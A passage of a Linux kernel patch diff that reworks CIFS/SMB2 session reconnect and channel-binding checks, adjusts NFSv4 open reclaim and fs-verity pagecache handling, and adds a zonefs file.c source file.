+@@ -3735,39 +3754,48 @@ cifs_setup_session(const unsigned int xid, struct cifs_ses *ses,
+ 		   struct nls_table *nls_info)
+ {
+ 	int rc = -ENOSYS;
+-	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&server->dstaddr;
+-	struct sockaddr_in *addr = (struct sockaddr_in *)&server->dstaddr;
++	struct TCP_Server_Info *pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&pserver->dstaddr;
++	struct sockaddr_in *addr = (struct sockaddr_in *)&pserver->dstaddr;
+ 	bool is_binding = false;
+ 
+ 	spin_lock(&ses->ses_lock);
+-	if (server->dstaddr.ss_family == AF_INET6)
+-		scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI6", &addr6->sin6_addr);
+-	else
+-		scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI4", &addr->sin_addr);
++	cifs_dbg(FYI, "%s: channel connect bitmap: 0x%lx\n",
++		 __func__, ses->chans_need_reconnect);
+ 
+ 	if (ses->ses_status != SES_GOOD &&
+ 	    ses->ses_status != SES_NEW &&
+ 	    ses->ses_status != SES_NEED_RECON) {
+ 		spin_unlock(&ses->ses_lock);
+-		return 0;
++		return -EHOSTDOWN;
+ 	}
+ 
+ 	/* only send once per connect */
+ 	spin_lock(&ses->chan_lock);
+-	if (CIFS_ALL_CHANS_GOOD(ses) ||
+-	    cifs_chan_in_reconnect(ses, server)) {
++	if (CIFS_ALL_CHANS_GOOD(ses)) {
++		if (ses->ses_status == SES_NEED_RECON)
++			ses->ses_status = SES_GOOD;
+ 		spin_unlock(&ses->chan_lock);
+ 		spin_unlock(&ses->ses_lock);
+ 		return 0;
+ 	}
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
++
+ 	cifs_chan_set_in_reconnect(ses, server);
++	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+ 	spin_unlock(&ses->chan_lock);
+ 
+ 	if (!is_binding)
+ 		ses->ses_status = SES_IN_SETUP;
+ 	spin_unlock(&ses->ses_lock);
+ 
++	/* update ses ip_addr only for primary chan */
++	if (server == pserver) {
++		if (server->dstaddr.ss_family == AF_INET6)
++			scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI6", &addr6->sin6_addr);
++		else
++			scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI4", &addr->sin_addr);
++	}
++
+ 	if (!is_binding) {
+ 		ses->capabilities = server->capabilities;
+ 		if (!linuxExtEnabled)
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 9f4486b705d5c..5542893ef03f7 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -1376,3 +1376,47 @@ int cifs_inval_name_dfs_link_error(const unsigned int xid,
+ 	return 0;
+ }
+ #endif
++
++int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry)
++{
++	int timeout = 10;
++	int rc;
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus != CifsNeedReconnect) {
++		spin_unlock(&server->srv_lock);
++		return 0;
++	}
++	timeout *= server->nr_targets;
++	spin_unlock(&server->srv_lock);
++
++	/*
++	 * Give demultiplex thread up to 10 seconds to each target available for
++	 * reconnect -- should be greater than cifs socket timeout which is 7
++	 * seconds.
++	 *
++	 * On "soft" mounts we wait once. Hard mounts keep retrying until
++	 * process is killed or server comes back on-line.
++	 */
++	do {
++		rc = wait_event_interruptible_timeout(server->response_q,
++						      (server->tcpStatus != CifsNeedReconnect),
++						      timeout * HZ);
++		if (rc < 0) {
++			cifs_dbg(FYI, "%s: aborting reconnect due to received signal\n",
++				 __func__);
++			return -ERESTARTSYS;
++		}
++
++		/* are we still trying to reconnect? */
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus != CifsNeedReconnect) {
++			spin_unlock(&server->srv_lock);
++			return 0;
++		}
++		spin_unlock(&server->srv_lock);
++	} while (retry);
++
++	cifs_dbg(FYI, "%s: gave up waiting on reconnect\n", __func__);
++	return -EHOSTDOWN;
++}
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index 6e6e44d8b4c79..b37379b62cc77 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -139,72 +139,12 @@ out:
+ 	return;
+ }
+ 
+-static int wait_for_server_reconnect(struct TCP_Server_Info *server,
+-				     __le16 smb2_command, bool retry)
+-{
+-	int timeout = 10;
+-	int rc;
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus != CifsNeedReconnect) {
+-		spin_unlock(&server->srv_lock);
+-		return 0;
+-	}
+-	timeout *= server->nr_targets;
+-	spin_unlock(&server->srv_lock);
+-
+-	/*
+-	 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
+-	 * here since they are implicitly done when session drops.
+-	 */
+-	switch (smb2_command) {
+-	/*
+-	 * BB Should we keep oplock break and add flush to exceptions?
+-	 */
+-	case SMB2_TREE_DISCONNECT:
+-	case SMB2_CANCEL:
+-	case SMB2_CLOSE:
+-	case SMB2_OPLOCK_BREAK:
+-		return -EAGAIN;
+-	}
+-
+-	/*
+-	 * Give demultiplex thread up to 10 seconds to each target available for
+-	 * reconnect -- should be greater than cifs socket timeout which is 7
+-	 * seconds.
+-	 *
+-	 * On "soft" mounts we wait once. Hard mounts keep retrying until
+-	 * process is killed or server comes back on-line.
+-	 */
+-	do {
+-		rc = wait_event_interruptible_timeout(server->response_q,
+-						      (server->tcpStatus != CifsNeedReconnect),
+-						      timeout * HZ);
+-		if (rc < 0) {
+-			cifs_dbg(FYI, "%s: aborting reconnect due to received signal\n",
+-				 __func__);
+-			return -ERESTARTSYS;
+-		}
+-
+-		/* are we still trying to reconnect? */
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus != CifsNeedReconnect) {
+-			spin_unlock(&server->srv_lock);
+-			return 0;
+-		}
+-		spin_unlock(&server->srv_lock);
+-	} while (retry);
+-
+-	cifs_dbg(FYI, "%s: gave up waiting on reconnect\n", __func__);
+-	return -EHOSTDOWN;
+-}
+-
+ static int
+ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	       struct TCP_Server_Info *server)
+ {
+ 	int rc = 0;
+-	struct nls_table *nls_codepage;
++	struct nls_table *nls_codepage = NULL;
+ 	struct cifs_ses *ses;
+ 
+ 	/*
+@@ -239,7 +179,28 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	    (!tcon->ses->server) || !server)
+ 		return -EIO;
+ 
+-	rc = wait_for_server_reconnect(server, smb2_command, tcon->retry);
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedReconnect) {
++		/*
++		 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
++		 * here since they are implicitly done when session drops.
++		 */
++		switch (smb2_command) {
++		/*
++		 * BB Should we keep oplock break and add flush to exceptions?
++		 */
++		case SMB2_TREE_DISCONNECT:
++		case SMB2_CANCEL:
++		case SMB2_CLOSE:
++		case SMB2_OPLOCK_BREAK:
++			spin_unlock(&server->srv_lock);
++			return -EAGAIN;
++		}
++	}
++	spin_unlock(&server->srv_lock);
++
++again:
++	rc = cifs_wait_for_server_reconnect(server, tcon->retry);
+ 	if (rc)
+ 		return rc;
+ 
+@@ -255,8 +216,7 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 		 tcon->ses->chans_need_reconnect,
+ 		 tcon->need_reconnect);
+ 
+-	nls_codepage = load_nls_default();
+-
++	mutex_lock(&ses->session_mutex);
+ 	/*
+ 	 * Recheck after acquire mutex. If another thread is negotiating
+ 	 * and the server never sends an answer the socket will be closed
+@@ -265,28 +225,38 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	spin_lock(&server->srv_lock);
+ 	if (server->tcpStatus == CifsNeedReconnect) {
+ 		spin_unlock(&server->srv_lock);
++		mutex_unlock(&ses->session_mutex);
++
++		if (tcon->retry)
++			goto again;
++
+ 		rc = -EHOSTDOWN;
+ 		goto out;
+ 	}
+ 	spin_unlock(&server->srv_lock);
+ 
++	nls_codepage = load_nls_default();
++
+ 	/*
+ 	 * need to prevent multiple threads trying to simultaneously
+ 	 * reconnect the same SMB session
+ 	 */
++	spin_lock(&ses->ses_lock);
+ 	spin_lock(&ses->chan_lock);
+-	if (!cifs_chan_needs_reconnect(ses, server)) {
++	if (!cifs_chan_needs_reconnect(ses, server) &&
++	    ses->ses_status == SES_GOOD) {
+ 		spin_unlock(&ses->chan_lock);
+-
++		spin_unlock(&ses->ses_lock);
+ 		/* this means that we only need to tree connect */
+ 		if (tcon->need_reconnect)
+ 			goto skip_sess_setup;
+ 
++		mutex_unlock(&ses->session_mutex);
+ 		goto out;
+ 	}
+ 	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
+ 
+-	mutex_lock(&ses->session_mutex);
+ 	rc = cifs_negotiate_protocol(0, ses, server);
+ 	if (!rc) {
+ 		rc = cifs_setup_session(0, ses, server, nls_codepage);
+@@ -302,10 +272,8 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 		mutex_unlock(&ses->session_mutex);
+ 		goto out;
+ 	}
+-	mutex_unlock(&ses->session_mutex);
+ 
+ skip_sess_setup:
+-	mutex_lock(&ses->session_mutex);
+ 	if (!tcon->need_reconnect) {
+ 		mutex_unlock(&ses->session_mutex);
+ 		goto out;
+@@ -320,7 +288,7 @@ skip_sess_setup:
+ 	cifs_dbg(FYI, "reconnect tcon rc = %d\n", rc);
+ 	if (rc) {
+ 		/* If sess reconnected but tcon didn't, something strange ... */
+-		pr_warn_once("reconnect tcon failed rc = %d\n", rc);
++		cifs_dbg(VFS, "reconnect tcon failed rc = %d\n", rc);
+ 		goto out;
+ 	}
+ 
+@@ -1292,9 +1260,9 @@ SMB2_sess_alloc_buffer(struct SMB2_sess_data *sess_data)
+ 	if (rc)
+ 		return rc;
+ 
+-	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	if (is_binding) {
+ 		req->hdr.SessionId = cpu_to_le64(ses->Suid);
+@@ -1452,9 +1420,9 @@ SMB2_auth_kerberos(struct SMB2_sess_data *sess_data)
+ 		goto out_put_spnego_key;
+ 	}
+ 
+-	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	/* keep session key if binding */
+ 	if (!is_binding) {
+@@ -1578,9 +1546,9 @@ SMB2_sess_auth_rawntlmssp_negotiate(struct SMB2_sess_data *sess_data)
+ 
+ 	cifs_dbg(FYI, "rawntlmssp session setup challenge phase\n");
+ 
+-	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	/* keep existing ses id and flags if binding */
+ 	if (!is_binding) {
+@@ -1646,9 +1614,9 @@ SMB2_sess_auth_rawntlmssp_authenticate(struct SMB2_sess_data *sess_data)
+ 
+ 	rsp = (struct smb2_sess_setup_rsp *)sess_data->iov[0].iov_base;
+ 
+-	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	/* keep existing ses id and flags if binding */
+ 	if (!is_binding) {
+diff --git a/fs/cifs/smb2transport.c b/fs/cifs/smb2transport.c
+index d827b7547ffad..790acf65a0926 100644
+--- a/fs/cifs/smb2transport.c
++++ b/fs/cifs/smb2transport.c
+@@ -81,6 +81,7 @@ int smb2_get_sign_key(__u64 ses_id, struct TCP_Server_Info *server, u8 *key)
+ 	struct cifs_ses *ses = NULL;
+ 	int i;
+ 	int rc = 0;
++	bool is_binding = false;
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 
+@@ -97,9 +98,12 @@ int smb2_get_sign_key(__u64 ses_id, struct TCP_Server_Info *server, u8 *key)
+ 	goto out;
+ 
+ found:
++	spin_lock(&ses->ses_lock);
+ 	spin_lock(&ses->chan_lock);
+-	if (cifs_chan_needs_reconnect(ses, server) &&
+-	    !CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
++
++	is_binding = (cifs_chan_needs_reconnect(ses, server) &&
++		      ses->ses_status == SES_GOOD);
++	if (is_binding) {
+ 		/*
+ 		 * If we are in the process of binding a new channel
+ 		 * to an existing session, use the master connection
+@@ -107,6 +111,7 @@ found:
+ 		 */
+ 		memcpy(key, ses->smb3signingkey, SMB3_SIGN_KEY_SIZE);
+ 		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
+ 		goto out;
+ 	}
+ 
+@@ -119,10 +124,12 @@ found:
+ 		if (chan->server == server) {
+ 			memcpy(key, chan->signkey, SMB3_SIGN_KEY_SIZE);
+ 			spin_unlock(&ses->chan_lock);
++			spin_unlock(&ses->ses_lock);
+ 			goto out;
+ 		}
+ 	}
+ 	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	cifs_dbg(VFS,
+ 		 "%s: Could not find channel signing key for session 0x%llx\n",
+@@ -392,11 +399,15 @@ generate_smb3signingkey(struct cifs_ses *ses,
+ 	bool is_binding = false;
+ 	int chan_index = 0;
+ 
++	spin_lock(&ses->ses_lock);
+ 	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
++	is_binding = (cifs_chan_needs_reconnect(ses, server) &&
++		      ses->ses_status == SES_GOOD);
++
+ 	chan_index = cifs_ses_get_chan_index(ses, server);
+ 	/* TODO: introduce ref counting for channels when the can be freed */
+ 	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	/*
+ 	 * All channels use the same encryption/decryption keys but
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 4214286e01450..4f4ef7aa2f4a0 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -1980,8 +1980,7 @@ _nfs4_opendata_reclaim_to_nfs4_state(struct nfs4_opendata *data)
+ 	if (!data->rpc_done) {
+ 		if (data->rpc_status)
+ 			return ERR_PTR(data->rpc_status);
+-		/* cached opens have already been processed */
+-		goto update;
++		return nfs4_try_open_cached(data);
+ 	}
+ 
+ 	ret = nfs_refresh_inode(inode, &data->f_attr);
+@@ -1990,7 +1989,7 @@ _nfs4_opendata_reclaim_to_nfs4_state(struct nfs4_opendata *data)
+ 
+ 	if (data->o_res.delegation_type != 0)
+ 		nfs4_opendata_check_deleg(data, state);
+-update:
++
+ 	if (!update_open_stateid(state, &data->o_res.stateid,
+ 				NULL, data->o_arg.fmode))
+ 		return ERR_PTR(-EAGAIN);
+diff --git a/fs/verity/enable.c b/fs/verity/enable.c
+index df6b499bf6a14..400c264bf8930 100644
+--- a/fs/verity/enable.c
++++ b/fs/verity/enable.c
+@@ -390,25 +390,27 @@ int fsverity_ioctl_enable(struct file *filp, const void __user *uarg)
+ 		goto out_drop_write;
+ 
+ 	err = enable_verity(filp, &arg);
+-	if (err)
+-		goto out_allow_write_access;
+ 
+ 	/*
+-	 * Some pages of the file may have been evicted from pagecache after
+-	 * being used in the Merkle tree construction, then read into pagecache
+-	 * again by another process reading from the file concurrently.  Since
+-	 * these pages didn't undergo verification against the file digest which
+-	 * fs-verity now claims to be enforcing, we have to wipe the pagecache
+-	 * to ensure that all future reads are verified.
++	 * We no longer drop the inode's pagecache after enabling verity.  This
++	 * used to be done to try to avoid a race condition where pages could be
++	 * evicted after being used in the Merkle tree construction, then
++	 * re-instantiated by a concurrent read.  Such pages are unverified, and
++	 * the backing storage could have filled them with different content, so
++	 * they shouldn't be used to fulfill reads once verity is enabled.
++	 *
++	 * But, dropping the pagecache has a big performance impact, and it
++	 * doesn't fully solve the race condition anyway.  So for those reasons,
++	 * and also because this race condition isn't very important relatively
++	 * speaking (especially for small-ish files, where the chance of a page
++	 * being used, evicted, *and* re-instantiated all while enabling verity
++	 * is quite small), we no longer drop the inode's pagecache.
+ 	 */
+-	filemap_write_and_wait(inode->i_mapping);
+-	invalidate_inode_pages2(inode->i_mapping);
+ 
+ 	/*
+ 	 * allow_write_access() is needed to pair with deny_write_access().
+ 	 * Regardless, the filesystem won't allow writing to verity files.
+ 	 */
+-out_allow_write_access:
+ 	allow_write_access(filp);
+ out_drop_write:
+ 	mnt_drop_write_file(filp);
+diff --git a/fs/zonefs/Makefile b/fs/zonefs/Makefile
+index 9fe54f5319f22..645f7229de4a0 100644
+--- a/fs/zonefs/Makefile
++++ b/fs/zonefs/Makefile
+@@ -3,4 +3,4 @@ ccflags-y				+= -I$(src)
+ 
+ obj-$(CONFIG_ZONEFS_FS) += zonefs.o
+ 
+-zonefs-y	:= super.o sysfs.o
++zonefs-y	:= super.o file.o sysfs.o
+diff --git a/fs/zonefs/file.c b/fs/zonefs/file.c
+new file mode 100644
+index 0000000000000..63cd50840419c
+--- /dev/null
++++ b/fs/zonefs/file.c
+@@ -0,0 +1,902 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * Simple file system for zoned block devices exposing zones as files.
++ *
++ * Copyright (C) 2022 Western Digital Corporation or its affiliates.
++ */
++#include <linux/module.h>
++#include <linux/pagemap.h>
++#include <linux/iomap.h>
++#include <linux/init.h>
++#include <linux/slab.h>
++#include <linux/blkdev.h>
++#include <linux/statfs.h>
++#include <linux/writeback.h>
++#include <linux/quotaops.h>
++#include <linux/seq_file.h>
++#include <linux/parser.h>
++#include <linux/uio.h>
++#include <linux/mman.h>
++#include <linux/sched/mm.h>
++#include <linux/task_io_accounting_ops.h>
++
++#include "zonefs.h"
++
++#include "trace.h"
++
++static int zonefs_read_iomap_begin(struct inode *inode, loff_t offset,
++				   loff_t length, unsigned int flags,
++				   struct iomap *iomap, struct iomap *srcmap)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	loff_t isize;
++
++	/*
++	 * All blocks are always mapped below EOF. If reading past EOF,
++	 * act as if there is a hole up to the file maximum size.
++	 */
++	mutex_lock(&zi->i_truncate_mutex);
++	iomap->bdev = inode->i_sb->s_bdev;
++	iomap->offset = ALIGN_DOWN(offset, sb->s_blocksize);
++	isize = i_size_read(inode);
++	if (iomap->offset >= isize) {
++		iomap->type = IOMAP_HOLE;
++		iomap->addr = IOMAP_NULL_ADDR;
++		iomap->length = length;
++	} else {
++		iomap->type = IOMAP_MAPPED;
++		iomap->addr = (z->z_sector << SECTOR_SHIFT) + iomap->offset;
++		iomap->length = isize - iomap->offset;
++	}
++	mutex_unlock(&zi->i_truncate_mutex);
++
++	trace_zonefs_iomap_begin(inode, iomap);
++
++	return 0;
++}
++
++static const struct iomap_ops zonefs_read_iomap_ops = {
++	.iomap_begin	= zonefs_read_iomap_begin,
++};
++
++static int zonefs_write_iomap_begin(struct inode *inode, loff_t offset,
++				    loff_t length, unsigned int flags,
++				    struct iomap *iomap, struct iomap *srcmap)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	loff_t isize;
++
++	/* All write I/Os should always be within the file maximum size */
++	if (WARN_ON_ONCE(offset + length > z->z_capacity))
++		return -EIO;
++
++	/*
++	 * Sequential zones can only accept direct writes. This is already
++	 * checked when writes are issued, so warn if we see a page writeback
++	 * operation.
++	 */
++	if (WARN_ON_ONCE(zonefs_zone_is_seq(z) && !(flags & IOMAP_DIRECT)))
++		return -EIO;
++
++	/*
++	 * For conventional zones, all blocks are always mapped. For sequential
++	 * zones, all blocks after always mapped below the inode size (zone
++	 * write pointer) and unwriten beyond.
++	 */
++	mutex_lock(&zi->i_truncate_mutex);
++	iomap->bdev = inode->i_sb->s_bdev;
++	iomap->offset = ALIGN_DOWN(offset, sb->s_blocksize);
++	iomap->addr = (z->z_sector << SECTOR_SHIFT) + iomap->offset;
++	isize = i_size_read(inode);
++	if (iomap->offset >= isize) {
++		iomap->type = IOMAP_UNWRITTEN;
++		iomap->length = z->z_capacity - iomap->offset;
++	} else {
++		iomap->type = IOMAP_MAPPED;
++		iomap->length = isize - iomap->offset;
++	}
++	mutex_unlock(&zi->i_truncate_mutex);
++
++	trace_zonefs_iomap_begin(inode, iomap);
++
++	return 0;
++}
++
++static const struct iomap_ops zonefs_write_iomap_ops = {
++	.iomap_begin	= zonefs_write_iomap_begin,
++};
++
++static int zonefs_read_folio(struct file *unused, struct folio *folio)
++{
++	return iomap_read_folio(folio, &zonefs_read_iomap_ops);
++}
++
++static void zonefs_readahead(struct readahead_control *rac)
++{
++	iomap_readahead(rac, &zonefs_read_iomap_ops);
++}
++
++/*
++ * Map blocks for page writeback. This is used only on conventional zone files,
++ * which implies that the page range can only be within the fixed inode size.
++ */
++static int zonefs_write_map_blocks(struct iomap_writepage_ctx *wpc,
++				   struct inode *inode, loff_t offset)
++{
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++
++	if (WARN_ON_ONCE(zonefs_zone_is_seq(z)))
++		return -EIO;
++	if (WARN_ON_ONCE(offset >= i_size_read(inode)))
++		return -EIO;
++
++	/* If the mapping is already OK, nothing needs to be done */
++	if (offset >= wpc->iomap.offset &&
++	    offset < wpc->iomap.offset + wpc->iomap.length)
++		return 0;
++
++	return zonefs_write_iomap_begin(inode, offset,
++					z->z_capacity - offset,
++					IOMAP_WRITE, &wpc->iomap, NULL);
++}
++
++static const struct iomap_writeback_ops zonefs_writeback_ops = {
++	.map_blocks		= zonefs_write_map_blocks,
++};
++
++static int zonefs_writepages(struct address_space *mapping,
++			     struct writeback_control *wbc)
++{
++	struct iomap_writepage_ctx wpc = { };
++
++	return iomap_writepages(mapping, wbc, &wpc, &zonefs_writeback_ops);
++}
++
++static int zonefs_swap_activate(struct swap_info_struct *sis,
++				struct file *swap_file, sector_t *span)
++{
++	struct inode *inode = file_inode(swap_file);
++
++	if (zonefs_inode_is_seq(inode)) {
++		zonefs_err(inode->i_sb,
++			   "swap file: not a conventional zone file\n");
++		return -EINVAL;
++	}
++
++	return iomap_swapfile_activate(sis, swap_file, span,
++				       &zonefs_read_iomap_ops);
++}
++
++const struct address_space_operations zonefs_file_aops = {
++	.read_folio		= zonefs_read_folio,
++	.readahead		= zonefs_readahead,
++	.writepages		= zonefs_writepages,
++	.dirty_folio		= filemap_dirty_folio,
++	.release_folio		= iomap_release_folio,
++	.invalidate_folio	= iomap_invalidate_folio,
++	.migrate_folio		= filemap_migrate_folio,
++	.is_partially_uptodate	= iomap_is_partially_uptodate,
++	.error_remove_page	= generic_error_remove_page,
++	.direct_IO		= noop_direct_IO,
++	.swap_activate		= zonefs_swap_activate,
++};
++
++int zonefs_file_truncate(struct inode *inode, loff_t isize)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	loff_t old_isize;
++	enum req_op op;
++	int ret = 0;
++
++	/*
++	 * Only sequential zone files can be truncated and truncation is allowed
++	 * only down to a 0 size, which is equivalent to a zone reset, and to
++	 * the maximum file size, which is equivalent to a zone finish.
++	 */
++	if (!zonefs_zone_is_seq(z))
++		return -EPERM;
++
++	if (!isize)
++		op = REQ_OP_ZONE_RESET;
++	else if (isize == z->z_capacity)
++		op = REQ_OP_ZONE_FINISH;
++	else
++		return -EPERM;
++
++	inode_dio_wait(inode);
++
++	/* Serialize against page faults */
++	filemap_invalidate_lock(inode->i_mapping);
++
++	/* Serialize against zonefs_iomap_begin() */
++	mutex_lock(&zi->i_truncate_mutex);
++
++	old_isize = i_size_read(inode);
++	if (isize == old_isize)
++		goto unlock;
++
++	ret = zonefs_inode_zone_mgmt(inode, op);
++	if (ret)
++		goto unlock;
++
++	/*
++	 * If the mount option ZONEFS_MNTOPT_EXPLICIT_OPEN is set,
++	 * take care of open zones.
++	 */
++	if (z->z_flags & ZONEFS_ZONE_OPEN) {
++		/*
++		 * Truncating a zone to EMPTY or FULL is the equivalent of
++		 * closing the zone. For a truncation to 0, we need to
++		 * re-open the zone to ensure new writes can be processed.
++		 * For a truncation to the maximum file size, the zone is
++		 * closed and writes cannot be accepted anymore, so clear
++		 * the open flag.
++		 */
++		if (!isize)
++			ret = zonefs_inode_zone_mgmt(inode, REQ_OP_ZONE_OPEN);
++		else
++			z->z_flags &= ~ZONEFS_ZONE_OPEN;
++	}
++
++	zonefs_update_stats(inode, isize);
++	truncate_setsize(inode, isize);
++	z->z_wpoffset = isize;
++	zonefs_inode_account_active(inode);
++
++unlock:
++	mutex_unlock(&zi->i_truncate_mutex);
++	filemap_invalidate_unlock(inode->i_mapping);
++
++	return ret;
++}
++
++static int zonefs_file_fsync(struct file *file, loff_t start, loff_t end,
++			     int datasync)
++{
++	struct inode *inode = file_inode(file);
++	int ret = 0;
++
++	if (unlikely(IS_IMMUTABLE(inode)))
++		return -EPERM;
++
++	/*
++	 * Since only direct writes are allowed in sequential files, page cache
++	 * flush is needed only for conventional zone files.
++	 */
++	if (zonefs_inode_is_cnv(inode))
++		ret = file_write_and_wait_range(file, start, end);
++	if (!ret)
++		ret = blkdev_issue_flush(inode->i_sb->s_bdev);
++
++	if (ret)
++		zonefs_io_error(inode, true);
++
++	return ret;
++}
++
++static vm_fault_t zonefs_filemap_page_mkwrite(struct vm_fault *vmf)
++{
++	struct inode *inode = file_inode(vmf->vma->vm_file);
++	vm_fault_t ret;
++
++	if (unlikely(IS_IMMUTABLE(inode)))
++		return VM_FAULT_SIGBUS;
++
++	/*
++	 * Sanity check: only conventional zone files can have shared
++	 * writeable mappings.
++	 */
++	if (zonefs_inode_is_seq(inode))
++		return VM_FAULT_NOPAGE;
++
++	sb_start_pagefault(inode->i_sb);
++	file_update_time(vmf->vma->vm_file);
++
++	/* Serialize against truncates */
++	filemap_invalidate_lock_shared(inode->i_mapping);
++	ret = iomap_page_mkwrite(vmf, &zonefs_write_iomap_ops);
++	filemap_invalidate_unlock_shared(inode->i_mapping);
++
++	sb_end_pagefault(inode->i_sb);
++	return ret;
++}
++
++static const struct vm_operations_struct zonefs_file_vm_ops = {
++	.fault		= filemap_fault,
++	.map_pages	= filemap_map_pages,
++	.page_mkwrite	= zonefs_filemap_page_mkwrite,
++};
++
++static int zonefs_file_mmap(struct file *file, struct vm_area_struct *vma)
++{
++	/*
++	 * Conventional zones accept random writes, so their files can support
++	 * shared writable mappings. For sequential zone files, only read
++	 * mappings are possible since there are no guarantees for write
++	 * ordering between msync() and page cache writeback.
++	 */
++	if (zonefs_inode_is_seq(file_inode(file)) &&
++	    (vma->vm_flags & VM_SHARED) && (vma->vm_flags & VM_MAYWRITE))
++		return -EINVAL;
++
++	file_accessed(file);
++	vma->vm_ops = &zonefs_file_vm_ops;
++
++	return 0;
++}
++
++static loff_t zonefs_file_llseek(struct file *file, loff_t offset, int whence)
++{
++	loff_t isize = i_size_read(file_inode(file));
++
++	/*
++	 * Seeks are limited to below the zone size for conventional zones
++	 * and below the zone write pointer for sequential zones. In both
++	 * cases, this limit is the inode size.
++	 */
++	return generic_file_llseek_size(file, offset, whence, isize, isize);
++}
++
++static int zonefs_file_write_dio_end_io(struct kiocb *iocb, ssize_t size,
++					int error, unsigned int flags)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++
++	if (error) {
++		zonefs_io_error(inode, true);
++		return error;
++	}
++
++	if (size && zonefs_inode_is_seq(inode)) {
++		/*
++		 * Note that we may be seeing completions out of order,
++		 * but that is not a problem since a write completed
++		 * successfully necessarily means that all preceding writes
++		 * were also successful. So we can safely increase the inode
++		 * size to the write end location.
++		 */
++		mutex_lock(&zi->i_truncate_mutex);
++		if (i_size_read(inode) < iocb->ki_pos + size) {
++			zonefs_update_stats(inode, iocb->ki_pos + size);
++			zonefs_i_size_write(inode, iocb->ki_pos + size);
++		}
++		mutex_unlock(&zi->i_truncate_mutex);
++	}
++
++	return 0;
++}
++
++static const struct iomap_dio_ops zonefs_write_dio_ops = {
++	.end_io			= zonefs_file_write_dio_end_io,
++};
++
++static ssize_t zonefs_file_dio_append(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct block_device *bdev = inode->i_sb->s_bdev;
++	unsigned int max = bdev_max_zone_append_sectors(bdev);
++	pgoff_t start, end;
++	struct bio *bio;
++	ssize_t size;
++	int nr_pages;
++	ssize_t ret;
++
++	max = ALIGN_DOWN(max << SECTOR_SHIFT, inode->i_sb->s_blocksize);
++	iov_iter_truncate(from, max);
++
++	/*
++	 * If the inode block size (zone write granularity) is smaller than the
++	 * page size, we may be appending data belonging to the last page of the
++	 * inode straddling inode->i_size, with that page already cached due to
++	 * a buffered read or readahead. So make sure to invalidate that page.
++	 * This will always be a no-op for the case where the block size is
